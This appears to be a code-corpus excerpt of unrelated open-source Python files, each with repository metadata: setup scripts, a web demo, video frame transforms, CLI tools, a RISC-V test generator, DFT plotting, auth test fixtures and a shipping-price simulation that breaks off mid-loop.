state_noise_amplitude: Amplitude scale parameter for additive state noise in model dynamics. Larger values correspond to larger magnitude additive noise in the state field. state_noise_length_scale: Length scale parameter for smoothed noise used to generate initial state and additive state noise fields. Larger values correspond to smoother fields. num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in approximating contour integrals in exponential time-differencing plus fourth-order Runge Kutta integrator. """ super().__init__( dim_state=dim_state, observation_space_indices=observation_space_indices, observation_function=observation_function, time_step=time_step, domain_extent=domain_extent, damping_coeff=damping_coeff, observation_noise_std=observation_noise_std, initial_state_amplitude=initial_state_amplitude, state_noise_amplitude=state_noise_amplitude, state_noise_length_scale=state_noise_length_scale, num_roots_of_unity_etdrk4_integrator=num_roots_of_unity_etdrk4_integrator, mesh_shape=(dim_state,), domain_extents=(domain_extent,), domain_is_periodic=True, observation_node_indices=observation_space_indices, )
47.072202
88
0.666692
12,126
0.923112
0
0
0
0
0
0
7,572
0.576431
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c
553
py
Python
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
"""Utiltiy functions for working with Myo Armband data.""" from setuptools import setup, find_packages setup(name='myo_helper', version='0.1', description='Utiltiy functions for working with Myo Armband data', author='Lif3line', author_email='[email protected]', license='MIT', packages=find_packages(), url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo install_requires=[ 'scipy', 'sklearn', 'numpy' ], keywords='myo emg')
27.65
85
0.631103
0
0
0
0
0
0
0
0
272
0.491863
4c3bcf54b28a72322eb20b3cefe8c6d28943d5e4
1,030
py
Python
demos/restful-users/index.py
karldoenitz/karlooper
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
[ "MIT" ]
161
2016-05-17T12:44:07.000Z
2020-07-30T02:18:34.000Z
demos/restful-users/index.py
karldoenitz/karlooper
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
[ "MIT" ]
6
2016-08-29T01:40:26.000Z
2017-12-29T09:20:41.000Z
demos/restful-users/index.py
karldoenitz/karlooper
2e1df83ed1ec9b343cdd930162a4de7ecd149c04
[ "MIT" ]
16
2016-06-27T02:56:54.000Z
2019-08-08T08:18:48.000Z
# -*-encoding:utf-8-*- import os from karlooper.web.application import Application from karlooper.web.request import Request class UsersHandler(Request): def get(self): return self.render("/user-page.html") class UserInfoHandler(Request): def post(self): print(self.get_http_request_message()) size = self.get_parameter("user_size", 0) size = int(size) user_list = [{"name": "name_%d" % i, "gender": "male", "age": i + 10} for i in range(size)] result = { "status": 0, "message": "OK", "data": user_list } return self.response_as_json(result) url_mapping = { "/users": UsersHandler, "/user-info": UserInfoHandler } settings = { "template": os.getcwd() + "/templates", "static": os.getcwd() + "/templates", "log_enable": False, "debug": True } if __name__ == '__main__': application = Application(url_mapping, settings=settings) application.listen(port=8080) application.run()
23.409091
99
0.61165
524
0.508738
0
0
0
0
0
0
202
0.196117
4c3c325909dda45d25ada2b46ed9a46e19b99dfc
4,154
py
Python
temporal_transforms.py
LijiangLong/3D-ResNets-PyTorch
89d2cba0b52d55aaa834635a81c172bc38771cd3
[ "MIT" ]
null
null
null
temporal_transforms.py
LijiangLong/3D-ResNets-PyTorch
89d2cba0b52d55aaa834635a81c172bc38771cd3
[ "MIT" ]
null
null
null
temporal_transforms.py
LijiangLong/3D-ResNets-PyTorch
89d2cba0b52d55aaa834635a81c172bc38771cd3
[ "MIT" ]
null
null
null
import random import math class LoopPadding(object): def __init__(self, size): self.size = size def __call__(self, frame_indices): out = frame_indices for index in out: if len(out) >= self.size: break out.append(index) return out class TemporalBeginCrop(object): """Temporally crop the given frame indices at a beginning. If the number of frames is less than the size, loop the indices as many times as necessary to satisfy the size. Args: size (int): Desired output size of the crop. """ def __init__(self, size): self.size = size def __call__(self, frame_indices): out = frame_indices[:self.size] for index in out: if len(out) >= self.size: break out.append(index) return out class TemporalCenterCrop(object): """Temporally crop the given frame indices at a center. If the number of frames is less than the size, loop the indices as many times as necessary to satisfy the size. Args: size (int): Desired output size of the crop. """ def __init__(self, size): self.size = size def __call__(self, frame_indices): """ Args: frame_indices (list): frame indices to be cropped. Returns: list: Cropped frame indices. """ center_index = len(frame_indices) // 2 begin_index = max(0, center_index - (self.size // 2)) end_index = min(begin_index + self.size, len(frame_indices)) out = frame_indices[begin_index:end_index] for index in out: if len(out) >= self.size: break out.append(index) return out class TemporalRandomCrop(object): """Temporally crop the given frame indices at a random location. If the number of frames is less than the size, loop the indices as many times as necessary to satisfy the size. Args: size (int): Desired output size of the crop. """ def __init__(self, size): self.size = size def __call__(self, frame_indices): """ Args: frame_indices (list): frame indices to be cropped. Returns: list: Cropped frame indices. """ rand_end = max(0, len(frame_indices) - self.size - 1) begin_index = random.randint(0, rand_end) end_index = min(begin_index + self.size, len(frame_indices)) out = frame_indices[begin_index:end_index] for index in out: if len(out) >= self.size: break out.append(index) return out class TemporalCenterCropFlexible(object): def __init__(self, begin=15, step=3, end=108): self.begin = begin self.step = step self.end = end assert (end - begin) / step + 1 == 32 def __call__(self, frame_indices): out = frame_indices[slice(self.begin, self.end+1, self.step)] return out class TemporalCenterRandomCrop(object): """Temporally crop the given frame indices at a random location. If the number of frames is less than the size, loop the indices as many times as necessary to satisfy the size. Args: size (int): Desired output size of the crop. """ def __init__(self, size): self.size = size def __call__(self, frame_indices): """ Args: frame_indices (list): frame indices to be cropped. Returns: list: Cropped frame indices. """ spacing = int((len(frame_indices) - self.size)/2) # i.e. if 120 and 90: = 30 offset = random.randint(-1*int(spacing/2) + 1, int(spacing/2) - 1) # i.e if 120 and 90, -14 to 14 begin_index = int(len(frame_indices)/2) - int(self.size/2) + offset # i.e. 120: 60 - 45 + offset (-1 to 29) end_index = begin_index + self.size out = frame_indices[begin_index:end_index] for index in out: if len(out) >= self.size: break out.append(index) return out
26.974026
115
0.590515
4,112
0.989889
0
0
0
0
0
0
1,556
0.374579
4c3c84ef8550fb8c1fe9332f31bf0fbd72087616
1,206
py
Python
cli/waiter/subcommands/kill.py
geofft/waiter
0e10cd497c2c679ea43231866d9f803c3fed5d77
[ "Apache-2.0" ]
null
null
null
cli/waiter/subcommands/kill.py
geofft/waiter
0e10cd497c2c679ea43231866d9f803c3fed5d77
[ "Apache-2.0" ]
null
null
null
cli/waiter/subcommands/kill.py
geofft/waiter
0e10cd497c2c679ea43231866d9f803c3fed5d77
[ "Apache-2.0" ]
null
null
null
from waiter.action import process_kill_request from waiter.util import guard_no_cluster, check_positive def kill(clusters, args, _, __): """Kills the service(s) using the given token name.""" guard_no_cluster(clusters) token_name_or_service_id = args.get('token-or-service-id') is_service_id = args.get('is-service-id', False) force_flag = args.get('force', False) timeout_secs = args['timeout'] success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs) return 0 if success else 1 def register(add_parser): """Adds this sub-command's parser and returns the action function""" parser = add_parser('kill', help='kill services') parser.add_argument('token-or-service-id') parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true') parser.add_argument('--service-id', '-s', help='kill by service id instead of token', dest='is-service-id', action='store_true') parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete', type=check_positive, default=30) return kill
46.384615
115
0.694859
0
0
0
0
0
0
0
0
421
0.349088
4c3ccdaafeb79fdce0197fde1a5c4f83054573ab
3,338
py
Python
a2t/src/a2t.py
syeda-khurrath/fabric8-analytics-common
421f7e27869c5695ed73b51e6422e097aba00108
[ "Apache-2.0" ]
null
null
null
a2t/src/a2t.py
syeda-khurrath/fabric8-analytics-common
421f7e27869c5695ed73b51e6422e097aba00108
[ "Apache-2.0" ]
4
2019-05-20T08:27:47.000Z
2019-05-20T08:29:57.000Z
a2t/src/a2t.py
codeready-analytics/fabric8-analytics-common
a763c5534d601f2f40a0f02c02914c49ea23669d
[ "Apache-2.0" ]
1
2020-10-05T21:12:44.000Z
2020-10-05T21:12:44.000Z
"""The main module of the Analytics API Load Tests tool. Copyright (c) 2019 Red Hat Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import sys import os from time import time from fastlog import log from csv_reader import read_csv_as_dicts from setup import setup from cliargs import cli_parser from component_analysis import ComponentAnalysis from stack_analysis import StackAnalysis from test_runner import start_tests # current version of this tool VERSION_MAJOR = 1 VERSION_MINOR = 0 def check_api_endpoint(api): """Check that some API endpoint is callable.""" log.info("Checking: core API endpoint") with log.indent(): if not api.is_api_running(): log.error("Fatal: tested system is not available") sys.exit(1) else: log.success("ok") def check_auth_token(api): """Check the authorization token for the core API.""" log.info("Checking: authorization token for the core API") with log.indent(): if api.check_auth_token_validity(): log.success("ok") else: log.error("Fatal: wrong token(?)") sys.exit(1) def check_system(api): """Check if all system endpoints are available and that tokens are valid.""" # try to access system endpoints log.info("System check") with log.indent(): check_api_endpoint(api) check_auth_token(api) def show_version(): """Show A2T version.""" print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR)) def main(): """Entry point to the Analytics API Load Tests.""" log.setLevel(log.INFO) cli_arguments = cli_parser.parse_args() if cli_arguments.version: show_version() sys.exit(0) else: cfg = setup(cli_arguments) coreapi_url = os.environ.get('F8A_SERVER_API_URL', None) component_analysis = ComponentAnalysis(coreapi_url, cfg["access_token"], cfg["user_key"], True) stack_analysis = StackAnalysis(coreapi_url, cfg["access_token"], cfg["user_key"], True) check_system(component_analysis) try: tests = read_csv_as_dicts(cfg["input_file"]) except Exception as e: log.error("Test description can not be read") log.error(e) sys.exit(0) t1 = time() tags = cfg["tags"] start_tests(cfg, tests, tags, component_analysis, stack_analysis) t2 = time() log.info("Start time: {}".format(t1)) log.info("End time: {}".format(t2)) log.info("Duration: {}".format(t2 - t1)) if __name__ == "__main__": # execute only if run as a script main()
30.345455
90
0.65698
0
0
0
0
0
0
0
0
1,418
0.424805
4c3d2c0aac2c057e54b3e25d8827904204518172
3,568
py
Python
riscv_ctg/ctg.py
Giri2801/riscv-ctg
a90e03f0856bbdd106c3f6d51815af94707e711e
[ "BSD-3-Clause" ]
null
null
null
riscv_ctg/ctg.py
Giri2801/riscv-ctg
a90e03f0856bbdd106c3f6d51815af94707e711e
[ "BSD-3-Clause" ]
null
null
null
riscv_ctg/ctg.py
Giri2801/riscv-ctg
a90e03f0856bbdd106c3f6d51815af94707e711e
[ "BSD-3-Clause" ]
null
null
null
# See LICENSE.incore file for details import os,re import multiprocessing as mp import time import shutil from riscv_ctg.log import logger import riscv_ctg.utils as utils import riscv_ctg.constants as const from riscv_isac.cgf_normalize import expand_cgf from riscv_ctg.generator import Generator from math import * from riscv_ctg.__init__ import __version__ def create_test(usage_str, node,label,base_isa,max_inst): global op_template global ramdomize global out_dir global xlen flen = 0 if 'opcode' not in node: return if 'ignore' in node: logger.info("Ignoring :" + str(label)) if node['ignore']: return for opcode in node['opcode']: op_node=None if opcode not in op_template: for op,foo in op_template.items(): if op!='metadata' and foo['std_op'] is not None and opcode==foo['std_op']: op_node = foo break else: op_node = op_template[opcode] if op_node is None: logger.warning("Skipping :" + str(opcode)) return if xlen not in op_node['xlen']: logger.warning("Skipping {0} since its not supported in current XLEN:".format(opcode)) return if 'flen' in op_node: if '.d' in opcode: flen = 64 elif '.s' in opcode: flen = 32 else: flen = op_node['flen'][0] #if flen not in op_node['flen']: # return fprefix = os.path.join(out_dir,str(label)) logger.info('Generating Test for :' + str(label) +"-" + opcode) formattype = op_node['formattype'] gen = Generator(formattype,op_node,opcode,randomize,xlen,flen,base_isa) op_comb = gen.opcomb(node) val_comb = gen.valcomb(node) instr_dict = gen.correct_val(gen.testreg(gen.swreg(gen.gen_inst(op_comb, val_comb, node)))) logger.info("Writing tests for :"+str(label)) my_dict = gen.reformat_instr(instr_dict) gen.write_test(fprefix,node,label,my_dict, op_node, usage_str, max_inst) def ctg(verbose, out, random ,xlen_arg, cgf_file,num_procs,base_isa, max_inst,list_duplicate): global op_template global randomize global out_dir global xlen logger.level(verbose) logger.info('****** RISC-V Compliance Test Generator {0} *******'.format(__version__ )) logger.info('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.') logger.info('All Rights Reserved.') logger.info("Copying env folder to Output directory.") env_dir = os.path.join(out,"env") if not os.path.exists(env_dir): shutil.copytree(const.env,env_dir) xlen = int(xlen_arg) out_dir = out randomize = random mytime = time.asctime(time.gmtime(time.time()) ) + ' GMT' cgf_argument = '' for cf in cgf_file: cgf_argument += '// --cgf {} \\\n'.format(cf) randomize_argument = '' if random is True: randomize_argument = ' \\\n// --randomize' usage_str = const.usage.safe_substitute(base_isa=base_isa, \ cgf=cgf_argument, version = __version__, time=mytime, \ randomize=randomize_argument,xlen=str(xlen_arg)) op_template = utils.load_yaml(const.template_file) cgf = expand_cgf(cgf_file,xlen,list_duplicate) pool = mp.Pool(num_procs) results = pool.starmap(create_test, [(usage_str, node,label,base_isa,max_inst) for label,node in cgf.items()]) pool.close()
37.166667
114
0.626962
0
0
0
0
0
0
0
0
559
0.15667
4c3e29e2ae1ab7be40f9cfea714aae230e6e4e54
2,146
py
Python
Back-End/Python/timers/clock_named_tuple.py
ASHISHKUMAR2411/Programming-CookBook
9c60655d64d21985ccb4196360858d98344701f9
[ "MIT" ]
25
2021-04-28T02:51:26.000Z
2022-03-24T13:58:04.000Z
Back-End/Python/timers/clock_named_tuple.py
ASHISHKUMAR2411/Programming-CookBook
9c60655d64d21985ccb4196360858d98344701f9
[ "MIT" ]
1
2022-03-03T23:33:41.000Z
2022-03-03T23:35:41.000Z
Back-End/Python/timers/clock_named_tuple.py
ASHISHKUMAR2411/Programming-CookBook
9c60655d64d21985ccb4196360858d98344701f9
[ "MIT" ]
15
2021-05-30T01:35:20.000Z
2022-03-25T12:38:25.000Z
from collections import namedtuple MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days') def add_time(start, duration, start_weekday=None): weekdays = [ 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday' ] start_time, period = start.split(' ') def process_time(): current_hour, current_minute = ([int(t) for t in start_time.split(':')]) end_hour, end_minute = ([int(d) for d in duration.split(':')]) # Adds Current time plus End Time Total end_hours, end_mins = (current_hour + end_hour, current_minute + end_minute) # Calculates Total days passed days = int(end_hours/24) # Calculates New Time new_time_array = [str(end_hours % 12 + end_mins // 60), ':', str(end_mins % 60).rjust(2, '0')] new_time_joined = ''.join(new_time_array) end_period = [period] # Clock, calculates the days elapsed clock = end_hours // 12 if start_weekday: start_day_idx = weekdays.index(start_weekday.title()) new_weekday = weekdays[(start_day_idx + days % 7) % 7] else: new_weekday = False # Figure out whether is AM or PM for i in range(clock): if end_period[-1].lower() == 'am': end_period.append('PM') else: end_period.append('AM') return MainTimer(new_time_joined, end_period, new_weekday, days) # Triggers process time function timed = process_time() def process_output(): new_time = f'New Time is >>> {timed.new_time_joined} {timed.end_period[-1]}' if timed.new_weekday: new_time += f'- {timed.new_weekday} -' if timed.days == 1 and (period != timed.end_period or timed.end_period == 'AM'): new_time += ' (new_day)' elif timed.days > 1: new_time += f' -Total days: {timed.days}- <<' return new_time new_time = process_output() return new_time print('---'*30) x = add_time('10:00 AM', '54:00', 'Monday') print(x) print('---'*30)
32.029851
102
0.592265
0
0
0
0
0
0
0
0
517
0.240913
4c405ed31ecc4361eadac459e688c3b9b4ba7bba
225
py
Python
mlsurvey/visualize/__init__.py
jlaumonier/mlsurvey
373598d067c7f0930ba13fe8da9756ce26eecbaf
[ "MIT" ]
null
null
null
mlsurvey/visualize/__init__.py
jlaumonier/mlsurvey
373598d067c7f0930ba13fe8da9756ce26eecbaf
[ "MIT" ]
null
null
null
mlsurvey/visualize/__init__.py
jlaumonier/mlsurvey
373598d067c7f0930ba13fe8da9756ce26eecbaf
[ "MIT" ]
null
null
null
from .analyze_logs import AnalyzeLogs from .search_interface import SearchInterface from .detail_interface import DetailInterface from .user_interface import UserInterface from .visualize_log_detail import VisualizeLogDetail
37.5
52
0.888889
0
0
0
0
0
0
0
0
0
0
4c4211ba5dbc8c290d97362485169fd20badaf8a
816
py
Python
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
phunc20/dsp
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
[ "MIT" ]
1
2021-03-12T18:32:06.000Z
2021-03-12T18:32:06.000Z
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
phunc20/dsp
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
[ "MIT" ]
null
null
null
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
phunc20/dsp
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
[ "MIT" ]
null
null
null
import matplotlib.pyplot as plt import numpy as np import sys sys.path.append('../../../software/models/') import dftModel as DFT import math k0 = 8.5 N = 64 w = np.ones(N) x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2)) mX, pX = DFT.dftAnal(x, w, N) y = DFT.dftSynth(mX, pX, N) plt.figure(1, figsize=(9.5, 5)) plt.subplot(311) plt.title('positive freq. magnitude spectrum in dB: mX') plt.plot(np.arange(mX.size), mX, 'r', lw=1.5) plt.axis([0,mX.size, min(mX), max(mX)+1]) plt.subplot(312) plt.title('positive freq. phase spectrum: pX') plt.plot(np.arange(pX.size), pX, 'c', lw=1.5) plt.axis([0, pX.size,-np.pi,np.pi]) plt.subplot(313) plt.title('inverse spectrum: IDFT(X)') plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5) plt.axis([-N/2,N/2-1,min(y), max(y)]) plt.tight_layout() plt.savefig('idft.png') plt.show()
23.314286
56
0.654412
0
0
0
0
0
0
0
0
153
0.1875
4c43be0918680e081f3bcc9acc58506e39754d60
1,421
py
Python
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
# setup.py as described in: # https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable # to install on your system, run: # > pip install -e . from setuptools import setup, find_packages setup( name='typobs', version='0.0.3', entry_points={ 'console_scripts': [ 'to_obsidian=to_obsidian:run', 'to_typora=to_typora:run', ] }, packages=find_packages(), # metadata to display on PyPI author="Jerzy Dziewierz", author_email="[email protected]", description="Convert between Typora and Obsidian link styles", keywords="Typora Obsidian Markdown link converter", url="https://github.com/jerzydziewierz/typobs", # project home page, if any project_urls={ "Bug Tracker": "https://github.com/jerzydziewierz/typobs", "Documentation": "https://github.com/jerzydziewierz/typobs", "Source Code": "https://github.com/jerzydziewierz/typobs", }, classifiers=[ "Programming Language :: Python", "Topic :: Documentation", "Topic :: Software Development :: Documentation", "Topic :: Office/Business", "Topic :: Text Processing :: Filters", "Topic :: Text Processing :: Markup", "Development Status :: 5 - Production/Stable", "Environment :: Console", "License :: OSI Approved :: Apache Software License", ] )
36.435897
87
0.640394
0
0
0
0
0
0
0
0
974
0.685433
4c43f28c0f9c6fae0da417c39d88b7b2698c63a6
5,775
py
Python
tests/fixtures.py
ehelms/system-baseline-backend
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
[ "Apache-2.0" ]
null
null
null
tests/fixtures.py
ehelms/system-baseline-backend
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
[ "Apache-2.0" ]
null
null
null
tests/fixtures.py
ehelms/system-baseline-backend
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
[ "Apache-2.0" ]
null
null
null
""" decoded AUTH_HEADER (newlines added for readability): { "identity": { "account_number": "1234", "internal": { "org_id": "5678" }, "type": "User", "user": { "email": "[email protected]", "first_name": "Firstname", "is_active": true, "is_internal": true, "is_org_admin": false, "last_name": "Lastname", "locale": "en_US", "username": "test_username" } } "entitlements": { "smart_management": { "is_entitled": true } } } """ AUTH_HEADER = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6" "IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiI1" "Njc4In0sInR5cGUiOiJVc2VyIiwidXNlciI6eyJl" "bWFpbCI6InRlc3RAZXhhbXBsZS5jb20iLCJmaXJz" "dF9uYW1lIjoiRmlyc3RuYW1lIiwiaXNfYWN0aXZl" "Ijp0cnVlLCJpc19pbnRlcm5hbCI6dHJ1ZSwiaXNf" "b3JnX2FkbWluIjpmYWxzZSwibGFzdF9uYW1lIjoi" "TGFzdG5hbWUiLCJsb2NhbGUiOiJlbl9VUyIsInVz" "ZXJuYW1lIjoidGVzdF91c2VybmFtZSJ9fSwiZW50" "aXRsZW1lbnRzIjogeyJzbWFydF9tYW5hZ2VtZW50" "IjogeyJpc19lbnRpdGxlZCI6IHRydWUgfX19Cg==" } AUTH_HEADER_NO_ENTITLEMENTS = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6Ij" "EyMzQiLCJ0eXBlIjoiVXNlciIsInVzZXIiOnsidXNl" "cm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIiwiZW1haWwiOi" "J0ZXN0QGV4YW1wbGUuY29tIiwiZmlyc3RfbmFtZSI6" "IkZpcnN0bmFtZSIsImxhc3RfbmFtZSI6Ikxhc3RuYW" "1lIiwiaXNfYWN0aXZlIjp0cnVlLCJpc19vcmdfYWRt" "aW4iOmZhbHNlLCJpc19pbnRlcm5hbCI6dHJ1ZSwibG" "9jYWxlIjoiZW5fVVMifSwiaW50ZXJuYWwiOnsib3Jn" "X2lkIjoiNTY3OCJ9fX0KCg==" } AUTH_HEADER_SMART_MGMT_FALSE = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6" "IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiAi" "NTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1c2VyIjp7" "ImVtYWlsIjoidGVzdEBleGFtcGxlLmNvbSIsImZp" "cnN0X25hbWUiOiJGaXJzdG5hbWUiLCJpc19hY3Rp" "dmUiOnRydWUsImlzX2ludGVybmFsIjp0cnVlLCJp" "c19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0X25hbWUi" "OiJMYXN0bmFtZSIsImxvY2FsZSI6ImVuX1VTIiwi" "dXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIn19LCJl" "bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu" "dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg==" } # this can't happen in real life, adding test anyway AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJpbnRlcm5hbCI6eyJvcmdf" "aWQiOiAiNTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1" "c2VyIjp7ImVtYWlsIjoidGVzdEBleGFtcGxlLmNv" "bSIsImZpcnN0X25hbWUiOiJGaXJzdG5hbWUiLCJp" "c19hY3RpdmUiOnRydWUsImlzX2ludGVybmFsIjp0" "cnVlLCJpc19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0" "X25hbWUiOiJMYXN0bmFtZSIsImxvY2FsZSI6ImVu" "X1VTIiwidXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1l" "In19LCJlbnRpdGxlbWVudHMiOnsic21hcnRfbWFu" "YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9" "fX0K" } """ decoded AUTH_HEADER_NO_ACCT (newlines added for readablity): { "identity": { "internal": { "org_id": "9999" }, "type": "User", "user": { "email": "[email protected]", "first_name": "No", "is_active": true, "is_internal": true, "is_org_admin": false, "last_name": "Number", "locale": "en_US", "username": "nonumber" } } } """ AUTH_HEADER_NO_ACCT = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJ0eXBlIjoiVXNlciIsInVzZXIiO" "nsidXNlcm5hbWUiOiJub251bWJlciIsImVtYWlsIjoibm" "9udW1iZXJAZXhhbXBsZS5jb20iLCJmaXJzdF9uYW1lIjo" "iTm8iLCJsYXN0X25hbWUiOiJOdW1iZXIiLCJpc19hY3Rp" "dmUiOnRydWUsImlzX29yZ19hZG1pbiI6ZmFsc2UsImlzX" "2ludGVybmFsIjp0cnVlLCJsb2NhbGUiOiJlbl9VUyJ9LC" "JpbnRlcm5hbCI6eyJvcmdfaWQiOiI5OTk5In19fQo=" } BASELINE_ONE_LOAD = { "baseline_facts": [ {"name": "arch", "value": "x86_64"}, {"name": "phony.arch.fact", "value": "some value"}, ], "display_name": "arch baseline", } BASELINE_TWO_LOAD = { "baseline_facts": [ {"name": "memory", "value": "64GB"}, {"name": "cpu_sockets", "value": "16"}, ], "display_name": "cpu + mem baseline", } BASELINE_THREE_LOAD = { "baseline_facts": [ {"name": "nested", "values": [{"name": "cpu_sockets", "value": "16"}]} ], "display_name": "cpu + mem baseline", } BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]} BASELINE_PARTIAL_TWO = { "display_name": "ABCDE", "baseline_facts": [ { "name": "hello", "values": [ {"name": "nested_one", "value": "one"}, {"name": "nested_two", "value": "two"}, ], } ], } BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"} CREATE_FROM_INVENTORY = { "display_name": "created_from_inventory", "inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa", } SYSTEM_WITH_PROFILE = { "account": "9876543", "bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb", "created": "2018-01-31T13:00:00.100010Z", "display_name": None, "fqdn": None, "id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa", "insights_id": "00000000-28af-11e9-9ab0-c85b761454fa", "ip_addresses": ["10.0.0.3", "2620:52:0:2598:5054:ff:fecd:ae15"], "mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"], "rhel_machine_id": None, "satellite_id": None, "subscription_manager_id": "RHN Classic and Red Hat Subscription Management", "system_profile": { "salutation": "hi", "system_profile_exists": False, "installed_packages": [ "openssl-1.1.1c-2.fc30.x86_64", "python2-libs-2.7.16-2.fc30.x86_64", ], "id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa", }, "tags": [], "updated": "2018-01-31T14:00:00.500000Z", }
31.557377
81
0.66303
0
0
0
0
0
0
0
0
4,557
0.789091
4c449a22ce009dfff20f9f81e80e2e5aae88a200
3,200
py
Python
2021-02-03/2.py
Elfenreigen/MCM-2021-C-SJTU-Test
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
[ "MIT" ]
1
2022-01-24T11:59:40.000Z
2022-01-24T11:59:40.000Z
2021-02-03/2.py
Elfenreigen/MCM-2021-C-SJTU-Test
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
[ "MIT" ]
null
null
null
2021-02-03/2.py
Elfenreigen/MCM-2021-C-SJTU-Test
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
[ "MIT" ]
null
null
null
#####Time Flow Simulation###### import numpy as np import pandas as pd import matplotlib.pyplot as plt from datetime import timedelta import datetime import csv data=pd.read_excel('CF66-all.xlsx') data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True) or_data=pd.read_excel('CF66-ordinary.xlsx') rule=pd.read_excel('6. Existing pricing strategy.xlsx') or_name=or_data['WBL_NUM'].unique() data['ordinary']=0 for i in range(len(data)): if data.iloc[i,2] in or_name: data.iloc[i,9]=1 data['volume']=data['CNTR_TYPE'] for i in range(len(data)): data.iloc[i,10]=int(data.iloc[i,10][0:2]) raw_data=data.groupby('SVVD') data_to_list=list(raw_data) raw_list=[] for i in data_to_list: raw_list.append(i[1]) total_volume=raw_data['volume'].sum()*1.2 thisrule=rule.groupby(['装港','卸港']).get_group(('营口','海口')) group_rule=thisrule.groupby(['开始天数','结束天数']) rule_to_list=list(group_rule) day_list=[] rule_list=[] for i in rule_to_list: day_list.append(i[0]) rule_list.append(i[1]) m=datetime.timedelta(days=14) newlist=[] for i in raw_list: i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT']) m=datetime.timedelta(days=14) j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m] newlist.append(j) del(raw_list) for i in newlist: i['acc_volume']=i['volume'].cumsum() i['total_volume']=i['volume'].sum()*1.2 m=datetime.timedelta(days=14) i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days i['acc_rate']=i['acc_volume']/i['total_volume']*100 i['new_AMT']=i['AMT'] for k in range(len(newlist)): acc_20gp=0 acc_40gp=0 acc_40hq=0 print('k='+str(k)) for i in range(len(day_list)): print('i='+str(i)) first_day=day_list[i][0] last_day=day_list[i][1] flag=[0]*len(rule_list[i]) for j in range(len(newlist[k])): if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1: for z in range(len(rule_list[i])): print('z='+str(z)) if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='涨价': if flag[z]==0: flag[z]=1 